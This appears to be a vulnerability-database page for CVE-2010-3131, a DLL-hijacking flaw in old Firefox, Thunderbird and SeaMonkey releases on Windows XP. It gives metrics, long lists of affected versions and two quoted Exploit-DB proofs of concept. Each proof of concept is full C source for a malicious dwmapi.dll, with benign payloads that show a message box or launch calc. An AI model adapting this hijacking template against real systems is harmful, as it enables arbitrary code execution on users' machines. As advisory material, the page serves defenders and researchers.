CVE-2010-3131 Detail

CVE-2010-3131

EPSS

24.22%V3

Vector

Network

Published

2010-08-26
16h00 +00:00

Modified

2018-10-10
16h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Untrusted search path vulnerability in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 on Windows XP allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a .htm, .html, .jtx, .mfp, or .eml file.

CVE Informations

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 14730

Publication date : 2010-08-23 22h00 +00:00
Author : Glafkos Charalambous
EDB Verified : Yes

/* Exploit Title: Firefox <= 3.6.8 DLL Hijacking Exploit [dwmapi.dll] Date: August 24, 2010 Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) Version: Latest Firefox v3.6.8 Tested on: Windows XP SP3 En Vulnerable extensions: .htm .html .jtx .mfp Greetz: Astalavista, OffSEC, Exploit-DB */ #include <windows.h> #define DllExport __declspec (dllexport) DllExport void CPAcquireContext() { pwn(); } DllExport void DWMAPI_100() { pwn(); } DllExport void DWMAPI_101() { pwn(); } DllExport void DwmEnableComposition() { pwn(); } DllExport void DWMAPI_103() { pwn(); } DllExport void DWMAPI_104() { pwn(); } DllExport void DWMAPI_105() { pwn(); } DllExport void DWMAPI_106() { pwn(); } DllExport void DWMAPI_107() { pwn(); } DllExport void DWMAPI_108() { pwn(); } DllExport void DWMAPI_109() { pwn(); } DllExport void DWMAPI_110() { pwn(); } DllExport void DWMAPI_111() { pwn(); } DllExport void DWMAPI_112() { pwn(); } DllExport void DWMAPI_113() { pwn(); } DllExport void DWMAPI_115() { pwn(); } DllExport void DWMAPI_116() { pwn(); } DllExport void DWMAPI_117() { pwn(); } DllExport void DWMAPI_118() { pwn(); } DllExport void DWMAPI_119() { pwn(); } DllExport void DWMAPI_120() { pwn(); } DllExport void DwmAttachMilContent() { pwn(); } DllExport void DwmDefWindowProc() { pwn(); } DllExport void DwmDetachMilContent() { pwn(); } DllExport void DwmEnableBlurBehindWindow() { pwn(); } DllExport void DwmEnableMMCSS() { pwn(); } DllExport void DwmExtendFrameIntoClientArea() { pwn(); } DllExport void DwmFlush() { pwn(); } DllExport void DwmGetColorizationColor() { pwn(); } DllExport void DwmGetCompositionTimingInfo() { pwn(); } DllExport void DwmGetGraphicsStreamClient() { pwn(); } DllExport void DwmGetGraphicsStreamTransformHint() { pwn(); } DllExport void DwmGetTransportAttributes() { pwn(); } DllExport void DwmGetWindowAttribute() { pwn(); } DllExport void DwmIsCompositionEnabled() { pwn(); } DllExport void DwmModifyPreviousDxFrameDuration() { pwn(); } DllExport void DwmQueryThumbnailSourceSize() { pwn(); } DllExport void DwmRegisterThumbnail() { pwn(); } DllExport void DwmSetDxFrameDuration() { pwn(); } DllExport void DwmSetPresentParameters() { pwn(); } DllExport void DwmSetWindowAttribute() { pwn(); } DllExport void DwmUnregisterThumbnail() { pwn(); } DllExport void DwmUpdateThumbnailProperties() { pwn(); } int pwn() { MessageBox(0, "Firefox DLL Hijacking!", "DLL Message", MB_OK); return 0; }

Exploit Database EDB-ID : 14783

Publication date : 2010-08-24 22h00 +00:00
Author : h4ck3r#47
EDB Verified : Yes

/* Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll ) Date: 26/08/2010 Author: h4ck3r#47 http://twitter.com/hxteam Version: Latest Mozilla Thunderbird 3.1.2 Tested on: Windows XP SP3 The code is based on the exploit from "TheLeader" Vulnerable extensions: .eml .html */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void DwmDefWindowProc() { evil(); } DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } DLLIMPORT void DwmEnableComposition() { evil(); } DLLIMPORT void DwmEnableMMCSS() { evil(); } DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT void DwmGetColorizationColor() { evil(); } DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } DLLIMPORT void DwmGetWindowAttribute() { evil(); } DLLIMPORT void DwmIsCompositionEnabled() { evil(); } DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT void DwmRegisterThumbnail() { evil(); } DLLIMPORT void DwmSetDxFrameDuration() { evil(); } DLLIMPORT void DwmSetPresentParameters() { evil(); } DLLIMPORT void DwmSetWindowAttribute() { evil(); } DLLIMPORT void DwmUnregisterThumbnail() { evil(); } DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 3.6

Mozilla>>Firefox >> Version 3.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6 (Open CPE detail)

Mozilla>>Firefox >> Version 3.6.2

Mozilla>>Firefox >> Version 3.6.2 (Open CPE detail)

Mozilla>>Firefox >> Version 3.6.3

Mozilla>>Firefox >> Version 3.6.3 (Open CPE detail)

Mozilla>>Firefox >> Version 3.6.4

Mozilla>>Firefox >> Version 3.6.4 (Open CPE detail)

Mozilla>>Firefox >> Version 3.6.6

Mozilla>>Firefox >> Version 3.6.6 (Open CPE detail)

Mozilla>>Firefox >> Version 3.6.7

Mozilla>>Firefox >> Version 3.6.7 (Open CPE detail)

Mozilla>>Firefox >> Version 3.6.8

Mozilla>>Firefox >> Version 3.6.8 (Open CPE detail)

Configuraton 0

Mozilla>>Seamonkey >> Version To (including) 2.0.6

Mozilla>>Seamonkey >> Version - (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.2 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.3 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.4 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.5 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.6 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.7 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.8 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0.9 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.2 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.3 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.4 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.5 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.6 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.7 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.8 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.9 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.10 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.11 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.12 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.13 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.14 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.15 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.16 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.17 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.18 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1.19 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.5.0.8 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.5.0.9 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.5.0.10 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0.2 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0.3 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0.4 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0.5 (Open CPE detail)
Mozilla>>Seamonkey >> Version 2.0.6 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0

Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0

Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0

Mozilla>>Seamonkey >> Version 1.0 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.1

Mozilla>>Seamonkey >> Version 1.0.1 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.2

Mozilla>>Seamonkey >> Version 1.0.2 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.3

Mozilla>>Seamonkey >> Version 1.0.3 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.4

Mozilla>>Seamonkey >> Version 1.0.4 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.5

Mozilla>>Seamonkey >> Version 1.0.5 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.6

Mozilla>>Seamonkey >> Version 1.0.6 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.7

Mozilla>>Seamonkey >> Version 1.0.7 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.8

Mozilla>>Seamonkey >> Version 1.0.8 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.0.9

Mozilla>>Seamonkey >> Version 1.0.9 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1

Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)
Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1

Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1

Mozilla>>Seamonkey >> Version 1.1 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.1

Mozilla>>Seamonkey >> Version 1.1.1 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.2

Mozilla>>Seamonkey >> Version 1.1.2 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.3

Mozilla>>Seamonkey >> Version 1.1.3 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.4

Mozilla>>Seamonkey >> Version 1.1.4 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.5

Mozilla>>Seamonkey >> Version 1.1.5 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.6

Mozilla>>Seamonkey >> Version 1.1.6 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.7

Mozilla>>Seamonkey >> Version 1.1.7 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.8

Mozilla>>Seamonkey >> Version 1.1.8 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.9

Mozilla>>Seamonkey >> Version 1.1.9 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.10

Mozilla>>Seamonkey >> Version 1.1.10 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.11

Mozilla>>Seamonkey >> Version 1.1.11 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.12

Mozilla>>Seamonkey >> Version 1.1.12 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.13

Mozilla>>Seamonkey >> Version 1.1.13 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.14

Mozilla>>Seamonkey >> Version 1.1.14 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.15

Mozilla>>Seamonkey >> Version 1.1.15 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.16

Mozilla>>Seamonkey >> Version 1.1.16 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.17

Mozilla>>Seamonkey >> Version 1.1.17 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.18

Mozilla>>Seamonkey >> Version 1.1.18 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.1.19

Mozilla>>Seamonkey >> Version 1.1.19 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.5.0.8

Mozilla>>Seamonkey >> Version 1.5.0.8 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.5.0.9

Mozilla>>Seamonkey >> Version 1.5.0.9 (Open CPE detail)

Mozilla>>Seamonkey >> Version 1.5.0.10

Mozilla>>Seamonkey >> Version 1.5.0.10 (Open CPE detail)